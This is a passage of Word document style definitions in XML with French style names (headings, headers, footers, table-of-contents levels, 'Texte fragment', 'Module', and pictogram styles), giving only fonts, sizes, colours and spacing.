      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre6Car">
    <w:name w:val="Titre 6 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre7Car">
    <w:name w:val="Titre 7 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre8Car">
    <w:name w:val="Titre 8 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre9Car">
    <w:name w:val="Titre 9 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pieddepage">
    <w:name w:val="footer"/>
    <w:basedOn w:val="En-Tete"/>
    <w:link w:val="PieddepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PieddepageCar">
    <w:name w:val="Pied de page Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Pieddepage"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="En-Tete">
    <w:name w:val="En-Tete"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
      <w:ind w:left="68" w:right="-68"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre-projet">
    <w:name w:val="Titre-projet"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001515C2"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000080"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NVersion">
    <w:name w:val="N°Version"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001515C2"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="En-tte">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="En-tteCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="En-tteCar">
    <w:name w:val="En-tête Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="En-tte"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Rfrence">
    <w:name w:val="Référence"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001515C2"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Date-doc">
    <w:name w:val="Date-doc"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001515C2"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="660"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Sommaire">
    <w:name w:val="Sommaire"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:pageBreakBefore/>
      <w:tabs>
        <w:tab w:val="left" w:pos="-5670"/>
      </w:tabs>
      <w:spacing w:after="360"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titredechapitre">
    <w:name w:val="Titre de chapitre"/>
    <w:next w:val="Textefragment"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:after="300"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Gras" w:hAnsi="Arial Gras" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="4D4D4D"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Textefragment">
    <w:name w:val="Texte fragment"/>
    <w:link w:val="TextefragmentCar"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="120"/>
      <w:ind w:left="57"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Sous-fragment">
    <w:name w:val="Sous-fragment"/>
    <w:next w:val="Picto"/>
    <w:link w:val="Sous-fragmentCar"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:right="57"/>
      <w:jc w:val="right"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:i/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Picto">
    <w:name w:val="Picto"/>
    <w:rsid w:val="001515C2"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Module">
    <w:name w:val="Module"/>
    <w:next w:val="Textefragment"/>
    <w:link w:val="ModuleCar"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:after="300"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000080"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Fragment">
    <w:name w:val="Fragment"/>
    <w:next w:val="Picto"/>
    <w:link w:val="FragmentCar"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:left="-69"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="En-ttetableau">
    <w:name w:val="En-tête tableau"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="60" w:after="60"/>
      <w:ind w:left="57"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Etape">
    <w:name w:val="Etape"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Fragmentsuite">
    <w:name w:val="Fragment suite"/>
    <w:basedOn w:val="Fragment"/>
    <w:next w:val="Picto"/>
    <w:autoRedefine/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index1">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="220" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index2">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="440" w:hanging="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Indextableau">
    <w:name w:val="Index tableau"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="60"/>
      <w:ind w:right="113"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:i/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="interligne">
    <w:name w:val="interligne"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listenumros">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="Textefragment"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="360"/>
        <w:tab w:val="num" w:pos="0"/>
        <w:tab w:val="num" w:pos="142"/>
      </w:tabs>
      <w:spacing w:before="80"/>
      <w:ind w:left="397" w:hanging="329"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listepuces">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Textefragment"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="360"/>
      </w:tabs>
      <w:spacing w:before="80"/>
      <w:ind w:left="408" w:hanging="340"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listepuces2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Textefragment"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="0"/>
      </w:tabs>
      <w:spacing w:before="20" w:after="20"/>
      <w:ind w:left="709" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Marquedecommentaire">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Modulesuite">
    <w:name w:val="Module suite"/>
    <w:basedOn w:val="Module"/>
    <w:next w:val="Normal"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:keepNext/>
      <w:pageBreakBefore/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MRS-Pictos">
    <w:name w:val="MRS-Pictos"/>
    <w:basedOn w:val="Textefragment"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:ind w:left="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MRS-Schmas">
    <w:name w:val="MRS-Schémas"/>
    <w:basedOn w:val="Textefragment"/>
    <w:rsid w:val="001515C2"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MRS-Units">
    <w:name w:val="MRS-Unités"/>
    <w:basedOn w:val="Textefragment"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:ind w:left="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MRS-Tableaux">
    <w:name w:val="MRS-Tableaux"/>
    <w:basedOn w:val="MRS-Units"/>
    <w:rsid w:val="001515C2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Normalcentr">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="60"/>
      <w:ind w:left="74" w:right="215"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Numrodepage">
    <w:name w:val="page number"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Textetableau">
    <w:name w:val="Texte tableau"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
      <w:ind w:left="74" w:right="74"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titreindex">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Index1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="1100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="1320"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="1540"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:left="1760"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lgende">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:qFormat/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Type-document">
    <w:name w:val="Type-document"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000080"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Titredudocument">
    <w:name w:val="Titre du document"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="38"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Suiviversion">
    <w:name w:val="Suivi_version"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Sous-titreAlphabtique">
    <w:name w:val="Sous-titre Alphabétique"/>
    <w:next w:val="Textefragment"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="388"/>
      </w:tabs>
      <w:spacing w:before="120"/>
      <w:ind w:left="397" w:hanging="340"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Sous-titrePuce">
    <w:name w:val="Sous-titre Puce"/>
    <w:basedOn w:val="Sous-titreAlphabtique"/>
    <w:next w:val="Textefragment"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:ind w:left="360" w:hanging="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NumTableau">
    <w:name w:val="Num Tableau"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="360"/>
        <w:tab w:val="num" w:pos="0"/>
        <w:tab w:val="num" w:pos="142"/>
      </w:tabs>
      <w:spacing w:before="60" w:after="60"/>
      <w:ind w:left="539" w:hanging="284"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Gras" w:hAnsi="Arial Gras"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MRS-Pictos-Conception">
    <w:name w:val="MRS-Pictos-Conception"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertextesuivivisit">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="001515C2"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textedebulles">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextedebullesCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00874FA8"/>
    <w:pPr>
      <w:spacing w:before="0"/>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874FA8"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DiffusionVeePee">
    <w:name w:val="Diffusion VeePee"/>
    <w:next w:val="Textefragment"/>
    <w:rsid w:val="001515C2"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="MRS-VeePee-pictos">
    <w:name w:val="MRS-VeePee-pictos"/>
    <w:basedOn w:val="MRS-Tableaux"/>
    <w:rsid w:val="001515C2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre10">
    <w:name w:val="Titre1"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00874FA8"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EF-chapitretitre">
    <w:name w:val="EF - chapitre titre"/>
    <w:next w:val="EFmoduletitre"/>
    <w:link w:val="EF-chapitretitreCar"/>
    <w:qFormat/>
    <w:rsid w:val="0002154A"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:ind w:left="340" w:hanging="340"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Gras" w:hAnsi="Arial Gras" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="4D4D4D"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ModuleCar">
    <w:name w:val="Module Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Module"/>
    <w:locked/>
